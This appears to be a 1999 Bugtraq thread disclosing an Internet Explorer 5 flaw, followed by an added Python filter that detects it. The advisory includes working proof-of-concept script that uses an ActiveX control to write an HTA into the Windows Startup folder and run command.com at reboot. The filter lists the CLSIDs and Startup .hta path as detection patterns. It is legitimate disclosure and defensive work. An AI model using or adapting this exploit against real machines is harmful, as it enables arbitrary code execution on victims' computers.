Win2000 RC1 build 2072 IE5 doesn't work. IE 5.0.2919.800

It reports security problem and this ActiveX control doesn't allow objects of type blah blah blah



-----Original Message-----
From: Bugtraq List [mailto:[EMAIL PROTECTED]]On Behalf Of
Micheal Patterson
Sent: August 23, 1999 2:03 AM
To: [EMAIL PROTECTED]
Subject: Re: IE 5.0 allows executing programs


This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well.

Micheal Patterson
[EMAIL PROTECTED]


----- Original Message -----
From: Georgi Guninski <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, August 21, 1999 11:17 AM
Subject: IE 5.0 allows executing programs


> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi
> Guninski
> is not liable for any damages caused by direct or indirect use of the
> information or functionality provided by this program.
> Georgi Guninski, bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
>
> Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
> allows executing arbitrary programs on the local machine by creating and
> overwriting local files and putting content in them.
>
> Details:
>
> The problem is the ActiveX Control "Object for constructing type
> libraries for scriptlets".
> It allows creating and overwriting local files, and more putting content
> in them.
> There is some unneeded information in the file, but part of the content
> may be chosen.
> So, an HTML Application file may be created, fed with exploit
> information and written to the StartUp folder.
> The next time the user reboots (which may be forced), the code in the
> HTML Application file will be executed.
> This vulnerability can be exploited via email.
>
> Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html
>
> Workaround:
> Disable Active Scripting
> or
> Disable Run ActiveX Controls and plug-ins
>
> The code is:
>
> <object id="scr"
>    classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> >
> </object>
> <SCRIPT>
> scr.Reset();
> scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
> scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
> scr.write();
> </SCRIPT>
> </object>
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro
>

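A content-filter check for the pattern the advisory describes, added here as an example and not part of the original thread: it flags HTML or HTML mail that references the two CLSIDs quoted above or a Startup-folder `.hta` path. It also catches a CLSID that appears only inside a script string, which a tag parser alone does not see. The function name, finding labels and the sample input are assumptions constructed for this example.

```python
import re
from html.parser import HTMLParser

# CLSIDs quoted in the advisory above; the descriptions are this example's own.
FLAGGED_CLSIDS = {
    "06290BD5-48AA-11D2-8432-006008C3FBFC": "type-library object for scriptlets",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "object the posted code calls Run() on",
}
CLSID_RE = re.compile(
    r"clsid:\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)
# Startup-folder path ending in .hta, with single or doubled separators.
STARTUP_HTA_RE = re.compile(r"start\s*up(?:\\|/)+[^\"'<>\\/]*\.hta\b", re.I)

# Constructed, inert sample: it only declares the markers, it writes nothing.
SAMPLE = r'''
<object id="a" classid="CLSID:06290bd5-48aa-11d2-8432-006008c3fbfc"></object>
<script>
var markup = "<object id='b' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>";
var target = "C:\\windows\\Start Menu\\Programs\\StartUp\\sample.hta";
</script>
'''

class _ObjectTags(HTMLParser):
    """Collects classid values from real <object> elements only."""
    def __init__(self):
        super().__init__()
        self.clsids = set()

    def handle_starttag(self, tag, attrs):
        if tag == "object":
            m = CLSID_RE.search(dict(attrs).get("classid") or "")
            if m:
                self.clsids.add(m.group(1).upper())

def scan_html(text):
    """Return a sorted list of (kind, detail) findings for one HTML body."""
    parser = _ObjectTags()
    parser.feed(text)
    parser.close()
    findings = set()
    # Raw-text pass: also sees CLSIDs carried inside script string literals.
    for clsid in {m.group(1).upper() for m in CLSID_RE.finditer(text)}:
        if clsid in FLAGGED_CLSIDS:
            kind = "object-tag" if clsid in parser.clsids else "clsid-in-string"
            findings.add((kind, clsid))
    if STARTUP_HTA_RE.search(text):
        findings.add(("startup-hta-path", "Startup folder .hta reference"))
    return sorted(findings)
```
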